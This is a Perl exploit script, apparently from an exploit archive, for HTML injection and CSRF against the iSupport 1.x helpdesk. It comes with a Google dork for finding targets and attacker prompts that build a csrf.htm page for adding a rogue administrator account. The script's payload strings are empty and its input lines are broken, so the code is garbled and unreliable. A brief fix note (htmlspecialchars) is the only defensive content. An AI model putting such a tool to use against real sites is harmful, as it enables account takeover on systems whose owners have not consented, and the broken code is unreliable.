#!/usr/bin/perl
########################################################################
# Title : iSupport v1.x => Html Code injection to add admin
# Author : Or4nG.M4n
# Version : 1.x
# Homepage : http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"
# Homepage : http://www.idevspot.com/
# Thnks :
# +----------------------------------+
# | xSs m4n i-Hmx h311 c0d3 |
# | Dr.Bnned ahwak2000 sa^Dev!L |
# +----------------------------------+
# html injection to add Admin
# vuln : pending_testimonials.php
#
#
#
#
# posted by
#
# [ Website ]
#
#
# |
#
# How i can Fixed ..
# in all vuln file
# Replace : echo $website; echo $title; echo $body; => Replace with => echo htmlspecialchars($website); like this ..
# Thnks to All Stupid Coders
system("cls");
print
"
+----------------------------------------+\n
| iSupport 1.x inject html to Add Admin |\n
| Or4nG.M4n sA^Dev!L xSs m4n i-Hmx |\n
+----------------------------------------+\n
Loading ...\n
";
sleep(3);
print "tragt & path #";
$h = ;
chomp $h;
print "User #";
$user = ;
chomp $user;
print "Mail #";
$mail = ;
chomp $mail;
print "Pass #";
$pass = ;
chomp $pass;
$html = '';
sleep(2);
print "Createing ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "Createing Done .. \n";
sleep(2);
print "Plz UPLOAD csrf.htm to your Site and Put's Url h3r3 #";
$csrf = ;
chomp $csrf;
$done = '';
sleep(2);
print "NOW INJECT This Code \n";
print $done."\n";
print "";
print "\n Enjoy .. ";
# The End
|